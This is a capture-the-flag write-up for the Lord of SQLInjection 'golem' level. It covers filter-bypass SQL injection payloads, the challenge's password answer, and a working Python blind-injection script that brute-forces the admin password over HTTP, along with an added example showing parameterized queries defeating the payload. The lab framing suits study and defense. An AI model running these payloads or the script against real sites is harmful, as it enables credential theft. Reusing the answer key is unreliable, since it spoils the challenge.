  • LOS - golem / level 11
    Web/SQLI 2024. 6. 24. 17:09

    Problem

    Solution

      if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
      if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 

    The pw parameter is filtered for or / and / substr( / =.

    or => ||

    and => %26%26 (URL-encoded &&)

    substr( => right(left(pw,1),1) or mid(pw,1,1)

    = => like

    Bypass the filter with these substitutions.
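
The blacklist above next to the fix for it, as an added example that is not part of the original post: the two regexes are ported to Python's `re`, and the rewritten payload passes them while a bound parameter treats the same string as plain data. The `users` table, its sample password and the helper names are constructed for illustration, and SQLite stands in for the challenge's database only to show parameter binding.

```python
import re
import sqlite3

# The challenge's two blacklist checks, ported from PHP preg_match to Python re.
BLOCK_1 = re.compile(r"prob|_|\.|\(\)", re.I)
BLOCK_2 = re.compile(r"or|and|substr\(|=", re.I)

# pw values as PHP sees them after URL decoding (%26%26 -> &&, %23 -> #).
NAIVE = "' or id='admin' and substr(pw,1,1)='a'#"
REWRITTEN = "' || id like 'admin' && mid(pw,1,1) like 'a'#"


def passes_blacklist(pw):
    """True when neither preg_match-style check would reject this pw."""
    return not (BLOCK_1.search(pw) or BLOCK_2.search(pw))


def make_db():
    """Constructed stand-in table; the password is a made-up sample value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def login_parameterized(conn, pw):
    """Hardened lookup: pw is bound as data, so its quotes and operators are inert."""
    row = conn.execute(
        "SELECT id FROM users WHERE id = 'admin' AND pw = ?", (pw,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for label, pw in (("naive", NAIVE), ("rewritten", REWRITTEN)):
        print(f"{label:9} passes blacklist: {passes_blacklist(pw)}  "
              f"parameterized login: {login_parameterized(conn, pw)}")
    print("correct password:", login_parameterized(conn, "constructed-secret"))
```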

     

    Answer

    ?pw=77d6290b

     

    Code

    This time the code uses a plain brute force rather than bit masking.

    import requests
    
    url = "input your url"
    # Assumption: the session cookie uses PHP's default name, PHPSESSID
    cookie = {"PHPSESSID": "input your cookie"}
    user = "admin"
    
    def find_length(url, cookie, user):
        """Increase i until length(pw) > i stops being true; that i is the length."""
        i = 1
    
        while True:
            # %26%26 is &&, %23 is # (comments out the rest of the query)
            params = f"?pw=' || id like '{user}' %26%26 length(pw) > {i}%23"
            print(params)
            send_url = url + params
    
            res = requests.get(send_url, cookies=cookie)
    
            if "Hello admin" not in res.text:
                break
            i += 1
        return i
    
    def blind(url, cookie, user, length):
        """Recover pw one character at a time with mid(pw,i,1) like 'c'."""
        # Renamed from str so the built-in type is not shadowed
        charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        result = ""
    
        for i in range(1, length+1):
            for ch in charset:
                print(ch, end=" ", flush=True)
                params = f"?pw=' || id like '{user}' %26%26 mid(pw,{i},1) like %27{ch}%27%23"
                send_url = url + params
                res = requests.get(send_url, cookies=cookie)
                
                if "Hello admin" in res.text:
                    result = result + ch
                    break
            print(f"\n{i} : {result}")
        return result
    
    length = find_length(url, cookie, user)
    print(f"Length : {length}")
    
    result_str = blind(url, cookie, user, length)
    print(result_str)

     
